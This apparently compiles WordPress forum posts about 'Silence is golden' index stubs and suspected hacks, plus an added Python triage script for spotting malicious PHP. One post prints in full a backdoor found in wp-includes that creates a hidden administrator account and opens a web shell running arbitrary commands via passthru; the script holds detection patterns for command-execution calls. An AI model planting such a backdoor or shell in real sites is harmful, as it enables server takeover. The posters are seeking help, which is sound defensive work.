Why doesn’t Sucuri mark this as okay automatically?

I was checking if I could access the PHP files directly in the browser and I saw that one of them shows part of the text and/or code.
I tested this with:
– twentytwenty
– twentyfifteen
– catch-evolution
– blankslate
The code or text displayed is part of that .php file, but not all. I am not sure if this is important, if I am allowed to explain this issue here, or where I should report this problem to give more details.

When I scanned with Wordfence, it detected that an unknown file was in my wp-includes directory named class.wp.php. I deleted the file from the directory but have kept it on my desktop for observation. I am posting the code here, kindly tell me if it is malicious or not, or if it has other files as well.
<?php error_reporting(0);
include $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
$table_name = $wpdb->get_blog_prefix();
$sample = 'a:1:{s:13:"administrator";b:1;}';
if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
if( isset($_GET['awu']) ) {
$wpdb->query("INSERT INTO $wpdb->users (<code>ID</code>, <code>user_login</code>, <code>user_pass</code>, <code>user_nicename</code>, <code>user_email</code>, <code>user_url</code>, <code>user_registered</code>, <code>user_activation_key</code>, <code>user_status</code>, <code>display_name</code>) VALUES ('1001010', '1001010', '\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870', '1001010', '[email protected]', '', '2011-06-07 00:00:00', '', '0', '1001010');");
$wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (1001010, '1001010', '{$table_name}capabilities', '{$sample}');");
$wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (NULL, '1001010', '{$table_name}user_level', '10');"); }
if( isset($_GET['dwu']) ) {
$wpdb->query("DELETE FROM $wpdb->users WHERE <code>ID</code> = 1001010");
$wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.<code>umeta_id</code> = 1001010");}
if( isset($_GET['console']) ) {function MakeSimpleForm() { ?> <form method='GET' action='<?=$_SERVER['PHP_SELF']?>'>
<input type=text name='cmd'> <input type=submit name='exec' value='ok'> </form> <? } function DoCmd($cmd) { ?>
<textarea rows=30 cols=80><?=passthru($cmd)?></textarea><br> <? } if ( isset($_REQUEST['exec']) && isset($_REQUEST['cmd']))
DoCmd($_REQUEST['cmd']); else MakeSimpleForm();}?>

wp-content
plugins
akismet
themes
I am concerned with starting out with a site that appears to be hacked.
Any suggestions?

Fatal error: Unknown: Cannot use output buffering in output buffering display handlers in Unknown on line 0
On digging a little deeper I found the index.php with
<?php
// Silence is golden.
?>
Has my site been hacked? I have searched this site and found most comments on this were 4-5 years old.
Any suggestion to resolve it would be welcome.
Thanks

I went to the file manager on ipower to look at the code for the WordPress index page on my site and found only the following code
<?php
// Silence is golden.
?>
I’m guessing this is some sort of hack, so I’m left trying to figure out if it is possible to save my blog content and how to prevent a similar hack occurring in the future once I get this issue resolved.
Any help is appreciated. Thanks, Hamilton

Filename: wp-content/index.php
File type: Core
Issue first detected: 21 hours 33 mins ago.
Severity: Critical
Status New
This WordPress core file has been modified and differs from the original file distributed with this version of WordPress.
The file now reads:
<?php
// Silence is golden.
?>
Apparently, the only change was the addition of the ?> at the end of the file.
The original file I downloaded when I installed WordPress does not contain that. What should I do?
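
Added example (not part of any post on this page, and not WordPress or Wordfence code): a Python triage helper that treats the "Silence is golden" stub as unchanged whether or not it ends with a closing ?> tag, which PHP does not require at the end of a file, and that flags the indicators visible in the class.wp.php sample posted earlier. The function names, labels and regexes are assumptions made for this illustration, and the sample inputs are constructed from lines quoted on the page.

```python
import re

# Stub text as quoted in the posts on this page.
STUB = "<?php\n// Silence is golden.\n"

# Hypothetical indicator set, derived from the class.wp.php sample on this page.
INDICATORS = {
    "command execution call": re.compile(
        r"\b(?:passthru|shell_exec|system|exec|popen|proc_open)\s*\("),
    "direct insert into users table": re.compile(
        r"INSERT\s+INTO\s+\$wpdb->users\b", re.I),
    "serialized administrator capability": re.compile(
        r's:13:"administrator";b:1'),
    "error reporting disabled": re.compile(r"error_reporting\(\s*0\s*\)"),
}

def normalize(src):
    """Drop BOM, CRLF, surrounding whitespace and one trailing '?>'."""
    src = src.lstrip("\ufeff").replace("\r\n", "\n").strip()
    if src.endswith("?>"):
        src = src[:-2].rstrip()
    return src

def is_stock_stub(src):
    # True only when nothing but the stub (plus an optional closing tag) remains.
    return normalize(src) == normalize(STUB)

def indicators(src):
    return [name for name, rx in INDICATORS.items() if rx.search(src)]

def classify(src):
    if is_stock_stub(src):
        return "stock-stub"
    return "suspicious" if indicators(src) else "needs-review"

# Constructed inputs; FRAGMENT reuses lines quoted from the posted sample.
WITH_CLOSING_TAG = "<?php\r\n// Silence is golden.\r\n?>\r\n"
STUB_PLUS_CODE = STUB + "?>\n<?php echo 1;\n"
FRAGMENT = ("<?php error_reporting(0);\n"
            "$sample = 'a:1:{s:13:\"administrator\";b:1;}';\n"
            "<textarea><?=passthru($cmd)?></textarea>\n")

if __name__ == "__main__":
    for label, src in [("closing tag", WITH_CLOSING_TAG),
                       ("stub plus code", STUB_PLUS_CODE),
                       ("fragment", FRAGMENT)]:
        print(label, "->", classify(src), indicators(src))
```

A file that starts with the stub but carries anything after it falls through to "needs-review" rather than being accepted, so appended code cannot hide behind the familiar comment.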

I have installed and used the Silence is Golden Plugin. Now I cannot access my admin area (the admin login screen). All I get is a 404 page, meaning that I am locked out of my site. Just in case this matters: I do NOT use WP Super Cache. I DO use the W3 Cache plugin. Any help please?

Today I wanted to do a post on my blog, but I couldn’t reach my admin. So I started seeking in the code what could cause the problem, and in this file I found why my WordPress acted very strange:
/wp-content/themes/index.php
Normally this file contains basic settings of the WordPress installation, but this time it contained the phrase: “Silence is golden”. When I googled that phrase I saw it meant my blog was hacked or something like that.
It’s very strange, because I only used a few plugins, had a very strong password that was nowhere noticed and I had the latest WordPress version…
Well never mind, I thought, I downloaded a new clean WordPress installation and opened it from the .rar / .zip file. After opening, the first thing I did was check the index.php in the theme folder… And there it is.. Silence is golden. So does that mean my installation is corrupted? Or is WordPress hacked or something like that (can’t be true, can it…)?
I’m always working on my Mac, and my virus scanner also hasn’t detected a virus or something like that. The strange thing is that the same happens when I take my laptop (Windows). The same thing happens there..
Can someone please tell me how to fix this? Thanks!

<?php
// Silence is golden.
?>
has been put in my index.php files in my theme folder and in the contents in my ftp. If I simply delete the code will that solve the problem? It would leave me with a blank index file.
Thanks!